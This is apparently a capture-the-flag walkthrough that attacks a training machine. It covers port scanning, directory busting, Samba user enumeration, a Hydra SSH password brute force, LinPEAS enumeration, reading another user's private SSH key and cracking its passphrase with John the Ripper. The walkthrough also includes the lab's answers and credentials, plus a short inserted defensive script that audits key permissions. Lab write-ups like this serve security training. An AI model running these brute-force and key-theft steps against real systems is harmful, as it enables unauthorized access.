
Task 1. Web App Testing and Privilege Escalation
Question 1.
Deploy the machine and connect to our network
Start the machine and connect to the THM network using openvpn or the attack box.
Question 2.
Find the services exposed by the machine
Nmap
# nmap -p- -A 10.10.204.61
Output
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.7
Found 6 ports open.
Question 3.
What is the name of the hidden directory on the web server (enter name without /)?
For this we use gobuster with the DirBuster directory-list-2.3-medium wordlist.
Gobuster
# gobuster dir -u http://10.10.204.61 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Scan returned 2 directories
Output
/development (Status: 301) [Size: 316] [--> http://10.10.20.44/development/]
/server-status (Status: 403) [Size: 299]
Answer 3.
/development
Question 4.
User brute-forcing to find the username & password
We could use hydra with username/password lists to brute-force credentials, but since Samba ports are exposed we will first enumerate the Samba shares and users with a tool called enum4linux.
Note
Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe formerly available from www.bindview.com.
It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpcclient, net and nmblookup.
enum4linux
# enum4linux -U -a 10.10.204.61
Output
Share Enumeration on 10.10.204.61
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
Found 2 usernames and 2 shares.
Question 5.
What is the username?
Answer 5.
jan
Question 6.
What is the password?
Since we have a username and port 22 (SSH) exposed, we can try brute-forcing the password with Hydra and the rockyou wordlist.
Note
Hydra is a parallelized password cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.
Hydra
# hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.204.61 ssh
Output
[22][ssh] host: 10.10.204.61 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
Success, Hydra found the password
Answer 6.
armando
Question 7.
What service do you use to access the server (answer in abbreviation in all caps)?
From our initial nmap scan we know that port 22 (SSH) is open, so we connect to the server over Secure Shell with username jan and password armando.
# ssh jan@10.10.204.61
Enter the password and we are in.
Answer 7.
SSH
Question 8.
Enumerate the machine to find any vectors for privilege escalation
Now that we have access to the server with jan's account, we can automate the enumeration with the LinPEAS script.
Note
LinPEAS is a script that searches for possible paths to escalate privileges on Linux/Unix*/MacOS hosts. The checks are explained on book.hacktricks.xyz.
So let’s get the script and copy it over to the server using jan’s credentials.
# git clone https://github.com/carlospolop/PEASS-ng.git
Navigate to the directory containing the linpeas.sh (PEASS-ng/linPEAS/linpeas.sh)
# scp linpeas.sh jan@10.10.204.61:/tmp
Once the transfer is complete, run the script. This takes some time so be patient.
The script flagged many interesting files, but the most valuable finding is Kay's private SSH key.
Question 9.
What is the name of the other user you found(all lower case)?
We got that from question 4 (enum4linux).
Answer 9.
Kay
Question 10.
If you have found another user, what can you do with this information?
From the linpeas output we can see that Kay's SSH private key is readable by our user, so we will use it to log in over SSH as Kay and see if we can find the final password.
The location of the private key is
/home/kay/.ssh/
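The readable private key above is the entire privilege-escalation vector, so here is the defender-side check for it. This is an added example, not part of the walkthrough: it audits a private key file for the two weaknesses (a file mode that lets other local users read it, and no passphrase) by reading the legacy PEM header or the openssh-key-v1 container header. The function names are my own, and the sample keys are constructed in code with only the header fields the check reads.

```python
import base64, os, stat, struct, tempfile

MAGIC = b"openssh-key-v1\x00"   # magic that opens every new-format OpenSSH private key

def _ssh_string(buf, off):
    # Read one SSH wire-format string (uint32 big-endian length + bytes)
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n

def key_is_passphrase_protected(text):
    """True if a legacy PEM or openssh-key-v1 private key needs a passphrase."""
    if "Proc-Type: 4,ENCRYPTED" in text:          # legacy PEM RSA/DSA/EC header
        return True
    if "BEGIN OPENSSH PRIVATE KEY" in text:       # new container: inspect header fields
        body = "".join(l for l in text.splitlines() if not l.startswith("-----"))
        blob = base64.b64decode(body)
        if not blob.startswith(MAGIC): raise ValueError("not an openssh-key-v1 blob")
        cipher, off = _ssh_string(blob, len(MAGIC))
        kdf, off = _ssh_string(blob, off)
        return cipher != b"none" and kdf != b"none"
    return False                                  # unknown format: treat as unprotected

def audit_private_key(path):
    # Return the weaknesses found: loose file mode and/or missing passphrase
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & (stat.S_IRWXG | stat.S_IRWXO):
        findings.append(f"readable by group/other (mode {mode:04o})")
    with open(path) as f:
        if not key_is_passphrase_protected(f.read()):
            findings.append("no passphrase")
    return findings

def make_sample_key(encrypted):
    # Constructed sample: only the container header is built, which is all the check reads
    s = lambda b: struct.pack(">I", len(b)) + b
    cipher, kdf = (b"aes256-ctr", b"bcrypt") if encrypted else (b"none", b"none")
    blob = MAGIC + s(cipher) + s(kdf) + s(b"") + struct.pack(">I", 1)
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(blob).decode()
            + "\n-----END OPENSSH PRIVATE KEY-----\n")

def demo():
    # Write one weak key (mode 0644, no passphrase) and one sound key, audit both
    d, results = tempfile.mkdtemp(), {}
    for name, mode, enc in (("weak", 0o644, False), ("ok", 0o600, True)):
        p = os.path.join(d, name)
        with open(p, "w") as f:
            f.write(make_sample_key(enc))
        os.chmod(p, mode)
        results[name] = audit_private_key(p)
    return results
```

Run `audit_private_key` over every `id_*` file under `/home/*/.ssh` to find keys that another local account could copy off the box the way the walkthrough does.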
Question 11.
What is the final password you obtain?
To log in with Kay's private key you have to provide a passphrase (which we don't know), since the key is passphrase-protected. Let's store the key in a file for now.
$ cat /home/kay/.ssh/id_rsa
Copy the output and paste it into a file on your local machine:
# nano /tmp/id_kay
Since we already have the private key we can try to figure out the password for the key using JohnTheRipper suite.
Note
John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems.
ssh2john is part of the John the Ripper suite. It is a script that converts an RSA/DSA/EC/OPENSSH private key into john's hash format so the passphrase can be cracked with JtR.
ssh2john
# /usr/share/john/ssh2john.py /tmp/id_kay > /tmp/s2j_kay
johntheripper
# john --wordlist=/usr/share/wordlists/rockyou.txt /tmp/s2j_kay
Output
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax (/tmp/kay_id)
Warning: Only 2 candidates left, minimum 8 needed for performance.
1g 0:00:00:04 DONE (2021-09-07 14:26) 0.2500g/s 3585Kp/s 3585Kc/s 3585KC/sa6_123..*7¡Vamos!
Session completed
Success, john found the password beeswax. Now using this passphrase we can unlock Kay’s private key and log in to the server as kay.
SSH
Enter the passphrase and we are in. Now let's have a look at the pass.bak file in Kay's home directory.
$ cat pass.bak
Output
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
Answer 11.
heresareallystrongpasswordthatfollowsthepasswordpolicy$$